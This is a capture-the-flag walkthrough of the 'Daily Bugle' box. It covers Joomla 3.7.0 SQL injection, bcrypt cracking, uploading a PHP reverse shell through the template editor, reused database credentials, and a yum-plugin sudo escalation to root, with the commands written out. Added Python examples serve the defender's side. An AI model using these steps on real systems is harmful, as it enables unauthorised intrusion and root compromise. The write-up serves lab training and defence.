Daily Bugle Walkthrough - Offensive Pentesting

Reconnaissance

As always, the first step is the reconnaissance phase, beginning with port scanning.

Ports Scanning

During this step we identify which services the target exposes behind its IP address.

nmap -sC -sV -oA nmap -Pn 10.10.88.15

22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
|   256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   syn-ack ttl 63 MariaDB (unauthorized)
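The scan output above is what a reviewer on the defending side would triage first. As an added example that is not part of the original walkthrough, the Python below parses nmap's normal-format port lines and their NSE script output into structured records, then turns them into the findings a defender would raise (database port exposed to the network, CMS fingerprinted from the generator tag, admin path disclosed by robots.txt, end-of-life PHP 5.x in the banner). The sample input is constructed from the scan above with the long host-key lines omitted; the regexes and the finding texts are my own, not nmap's.

```python
import re

# Constructed sample input: the service lines from the nmap output above,
# with the long SSH host-key lines left out.
SAMPLE_NMAP = """\
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open  mysql   syn-ack ttl 63 MariaDB (unauthorized)
"""

# One port line: "<port>/<proto> <state> <service> [<reason> ttl <n>] <version...>"
# (the "<reason> ttl <n>" part only appears when nmap prints reasons, so it is optional).
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+\S+\s+ttl\s+\d+)?\s*(?P<version>.*)$"
)
# NSE script lines start with "|" or "|_" and belong to the preceding port.
SCRIPT_RE = re.compile(r"^\|_?\s?(?P<text>.*)$")


def parse_nmap(text):
    """Return one dict per port line, each carrying its script-output lines."""
    services = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["scripts"] = []
            services.append(entry)
            continue
        s = SCRIPT_RE.match(line)
        if s and services:
            services[-1]["scripts"].append(s.group("text").strip())
    return services


def exposure_findings(services):
    """Defender-side triage: the findings a reviewer would raise from this scan."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        tag = f"{svc['port']}/{svc['proto']}"
        script_text = " ".join(svc["scripts"])
        if svc["service"] == "mysql":
            findings.append(f"{tag}: database service ({svc['version']}) reachable from the "
                            "network; bind it to localhost or firewall it")
        if "Joomla!" in script_text:
            findings.append(f"{tag}: Joomla CMS fingerprinted via the generator meta tag")
        if "/administrator/" in script_text:
            findings.append(f"{tag}: admin path disclosed by robots.txt; restrict "
                            "/administrator/ by source address or a second factor")
        if "PHP/5." in svc["version"]:
            findings.append(f"{tag}: PHP 5.x advertised in the banner is end-of-life")
    return findings


if __name__ == "__main__":
    for finding in exposure_findings(parse_nmap(SAMPLE_NMAP)):
        print("-", finding)
```

The same parser works on the `.nmap` file that `-oA nmap` writes, since that file uses the normal output format shown above.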

Enumerating Port 80

We can start by looking at the web server. Opening the URL in a browser shows that the site runs the Joomla CMS.

Enumerating Joomla Using Joomscan

perl joomscan.pl -u http://10.10.97.153

Running joomscan tells us the version is Joomla 3.7.0. The version can also be found by reading README.txt.

Searchsploit

This Joomla 3.7 version is vulnerable to SQL injection.

Exploit-DB

Joomla! 3.7.0 - ‘com_fields’ SQL Injection

Let's exploit it. SQLMap is one option, but while doing a Google search I stumbled upon a script called Joomblah.

python joomblah.py http://10.10.97.153

Running the script returned the username jonah and a hashed credential.

Let's identify which hashing algorithm it uses with the hashid tool.

hashid hash.txt



Cracking bcrypt Hash

Hashcat

Let's crack the hash using hashcat with -m 3200, the mode for bcrypt.

hashcat -m 3200 -a 0 --force hash.txt /usr/share/wordlists/rockyou.txt

Cracking the hash took a while; alternatively, you can use John.

John

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
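Why did cracking take a while, and how does hashid know it is bcrypt? As an added example that is not part of the original walkthrough, the Python below classifies a hash by its format (the way hashid does, reduced to a handful of signatures), maps each format to its hashcat -m value, and pulls the cost parameter out of a bcrypt string. Joomla stores passwords as `$2y$` bcrypt with PHP's default cost of 10, meaning every guess costs 2^10 key-setup rounds, which is what makes a rockyou run slow compared with raw MD5. The sample hashes are constructed and are not the hash recovered from the box; the function names are mine.

```python
import re

# Constructed sample hashes; neither is the hash recovered from the box.
# bcrypt layout: "$2y$" + two-digit cost + "$" + 22-char salt + 31-char digest (60 chars).
SAMPLE_BCRYPT = "$2y$10$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"
SAMPLE_RAW_HEX = "0123456789abcdef0123456789abcdef"

# (name, format signature, hashcat -m value), tried in order.
SIGNATURES = [
    ("bcrypt", re.compile(r"^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$"), 3200),
    ("sha512crypt", re.compile(r"^\$6\$[^$]+\$[./A-Za-z0-9]{86}$"), 1800),
    ("md5crypt", re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"), 500),
    ("raw 32-hex (MD5-like)", re.compile(r"^[0-9a-fA-F]{32}$"), 0),
    ("raw 40-hex (SHA-1-like)", re.compile(r"^[0-9a-fA-F]{40}$"), 100),
]


def identify_hash(h):
    """Classify a hash by its format; returns (name, hashcat_mode) or ("unknown", None)."""
    h = h.strip()
    for name, pattern, mode in SIGNATURES:
        if pattern.match(h):
            return name, mode
    return "unknown", None


def bcrypt_cost(h):
    """Return the cost parameter of a bcrypt hash; each guess runs 2**cost rounds."""
    m = re.match(r"^\$2[abxy]\$(\d{2})\$", h.strip())
    if not m:
        raise ValueError("not a bcrypt hash")
    return int(m.group(1))


def bcrypt_rounds(cost):
    """Number of expensive key-setup rounds implied by a cost parameter."""
    return 2 ** cost


def cracking_effort(h, wordlist_size):
    """Total key-setup rounds a dictionary attack must compute: guesses * 2**cost."""
    return wordlist_size * bcrypt_rounds(bcrypt_cost(h))


def relative_slowdown(cost_from, cost_to):
    """Factor by which raising the cost from cost_from to cost_to slows every guess."""
    return 2 ** (cost_to - cost_from)


if __name__ == "__main__":
    name, mode = identify_hash(SAMPLE_BCRYPT)
    print(f"{name} (hashcat -m {mode}), cost {bcrypt_cost(SAMPLE_BCRYPT)}")
    print("rounds per guess:", bcrypt_rounds(bcrypt_cost(SAMPLE_BCRYPT)))
    print("cost 10 -> 12 slows each guess by", relative_slowdown(10, 12), "x")
```

The defender's takeaway is the last line: raising the cost by two doubles the work twice over, so a site that must keep password hashes in a world-readable database is better served by a higher bcrypt cost than by a longer wordlist ban.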

Once you're done cracking the hash and have the password, log in at http://IP/administrator with the username jonah and the password you found.


Exploitation

Now we need a reverse shell to get low-privilege access to the machine.

Go to Templates > New File

Paste the contents of php-reverse-shell.php into the shell.php file we just created in Joomla.

Now, if you access the URL via http://IP/templates/protostar/shell.php you’ll get a reverse shell.


We got 'Permission denied' when trying to access jjameson's home directory.

Let’s find credentials for this user.

After some digging I came across a configuration.php file inside /var/www/html.

configuration.php holds Joomla's settings, including the database username, password, and database name.

Luckily, the credentials found in configuration.php are reused for the jjameson account, so we can log in with ssh as jjameson.
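The weakness here is twofold: the database password sits in a file the web server can read, and the same password is reused for a shell account. Password reuse across systems cannot be detected by looking at one file, but the file itself can be audited. As an added example that is not part of the original walkthrough, the Python below parses a configuration.php in the shape Joomla writes (a `JConfig` class of `public $name = 'value';` properties), flags a file mode that lets other users read it, and flags a database account that is `root` or has a short password. The sample file and its values are constructed; the function names are mine.

```python
import os
import re
import stat
import tempfile

# Constructed sample in the shape Joomla writes configuration.php; all values invented.
SAMPLE_CONFIG = """<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'ExamplePassword123';
    public $db = 'joomla';
    public $dbprefix = 'fb9j5_';
    public $secret = 'exampleSecretValue';
}
"""

# Matches one property assignment; the value may contain escaped quotes.
PROP_RE = re.compile(r"public\s+\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")


def parse_joomla_config(text):
    """Return the JConfig properties as a dict of name -> value."""
    return {name: value for name, value in PROP_RE.findall(text)}


def mode_findings(mode):
    """Findings for a configuration.php permission mode (int, e.g. 0o644)."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(f"configuration.php is world-readable (mode {mode:04o}); "
                        "use 0640 owned by the deploy user with the web server group")
    if mode & (stat.S_IWOTH | stat.S_IWGRP):
        findings.append(f"configuration.php is writable by group or others (mode {mode:04o})")
    return findings


def config_findings(cfg):
    """Findings about the database account the site uses."""
    findings = []
    if cfg.get("user") == "root":
        findings.append("database user is root; use a dedicated account limited to the Joomla database")
    if len(cfg.get("password", "")) < 12:
        findings.append("database password is shorter than 12 characters")
    if not cfg.get("secret"):
        findings.append("$secret is empty; Joomla session and token signing depends on it")
    return findings


def audit_file(path):
    """Combine permission and content checks for one configuration.php."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8") as fh:
        cfg = parse_joomla_config(fh.read())
    return mode_findings(mode) + config_findings(cfg)


def run_demo():
    """Write the constructed sample with the common 0644 mode and audit it."""
    path = os.path.join(tempfile.mkdtemp(), "configuration.php")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONFIG)
    os.chmod(path, 0o644)
    return audit_file(path)


if __name__ == "__main__":
    for finding in run_demo():
        print("-", finding)
```

On the box the file was readable by the low-privilege web shell, which is exactly the case the first check flags; the second check matters because a database account named root invites the reuse the walkthrough then exploits.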


Privilege Escalation

Once we're on the machine, let's escalate our privileges to root.

The first thing to check is sudo -l, to see which commands the current user is allowed to run as root.

(ALL) NOPASSWD: /usr/bin/yum

After a quick search, I found an entry on GTFOBins for becoming root by running a few commands with yum.

[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# 
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# wc -c /root/root.txt 
33 /root/root.txt
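The session above shows why "(ALL) NOPASSWD: /usr/bin/yum" is a root grant in all but name: yum accepts a user-supplied config file (-c) and plugin path, and loads a Python plugin as root. As an added example that is not part of the original walkthrough, the Python below parses the rules that `sudo -l` prints and raises the findings a sudoers review would: unrestricted ALL, NOPASSWD tags, and commands (yum, from this page) that load caller-controlled config or plugins, where restricting the command's arguments would not help and the rule should be removed or replaced by a purpose-built wrapper. The sample `sudo -l` output reuses the rule from the box plus two invented rules for contrast; the parser and finding texts are mine.

```python
import re

# Constructed sample: the rule printed on the box plus two invented rules for contrast.
SAMPLE_SUDO_L = """\
User jjameson may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
    (ALL) ALL
"""

# One rule line: "(<runas>) [TAG: ...] <command and args>"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmd>.+)$")

# Binaries that read a caller-controlled config or plugin directory when run.
# From the session on this page: "yum -c <file> --enableplugin=<name>" executes a
# Python plugin as root, so argument restrictions on yum are not a mitigation.
PLUGIN_LOADING = {"/usr/bin/yum"}


def parse_sudo_l(text):
    """Return one dict per rule line of `sudo -l` output."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User ... may run ..."
        tags = (m.group("tags") or "").replace(":", " ").split()
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def sudo_findings(rules):
    """Findings a sudoers review would raise for the parsed rules."""
    findings = []
    for r in rules:
        if r["command"] == "ALL":
            findings.append(f"({r['runas']}) ALL: unrestricted sudo, equivalent to root")
            continue
        binary = r["command"].split()[0]
        if r["nopasswd"]:
            findings.append(f"NOPASSWD on {r['command']}: a captured shell escalates "
                            "without knowing the user's password")
        if binary in PLUGIN_LOADING:
            findings.append(f"{binary} loads caller-supplied config and plugins as root; "
                            "treat the rule as a root grant and remove it")
    return findings


if __name__ == "__main__":
    for finding in sudo_findings(parse_sudo_l(SAMPLE_SUDO_L)):
        print("-", finding)
```

For detection, sudo logs every invocation with its full command line through syslog's authpriv facility, which on CentOS lands in /var/log/secure; a `sudo yum -c /tmp/...` line with a config file outside /etc is the signal this technique leaves behind.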